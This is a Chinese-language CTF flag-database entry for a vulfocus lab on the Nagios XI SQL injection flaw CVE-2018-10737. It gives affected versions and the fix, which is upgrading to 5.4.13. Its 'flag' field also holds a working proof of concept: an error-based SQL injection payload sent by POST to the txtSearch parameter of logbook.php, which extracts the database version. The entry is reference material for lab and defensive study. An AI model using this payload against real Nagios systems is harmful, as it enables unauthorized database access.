[随波逐流]CTF Flags

   [随波逐流]CTF Flags

软件版本:v1.0.0   数据版本: v20260201
我要添加Flag 下    载
返    回

nagiosxi SQL注入 (CVE-2018-10737)

 广告模块
天天开红包最高25888元
ID: 16622
标题: nagiosxi SQL注入 (CVE-2018-10737)
描述: nagiosxi SQL注入 (CVE-2018-10737) vulfocus/nagiosxi-cve_2018_10737:latest Nagios XI是美国Nagios公司的一套IT基础设施监控解决方案。该方案支持对应用、服务、操作系统等进行监控和预警。 Nagios XI 5.4.13之前版本中存在SQL注入漏洞。远程攻击者可借助‘txtSearch’参数利用该漏洞执行任意的SQL命令。
类型: WEB
网站: vulfocus
题目链接: https://vulfocus.cn
赛事: None
年度: None
Flag值: NagiosXI <= 5.4.12 存在 SQL 注入漏洞(CVE-2018-10737),攻击者可通过 admin/logbook.php 的 txtSearch 参数执行任意 SQL 命令。受影响版本为 5.2.x 和 5.4.x(<5.4.13),修复方法为升级至 5.4.13 或以上版本。漏洞 PoC 示例为: POST /nagiosql/admin/logbook.php txtSearch=-1%' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# 验证后的网址为:https://www.seebug.org/vuldb/ssvid-97267
writeup: https://www.seebug.org/vuldb/ssvid-97267
答案错误,我要更正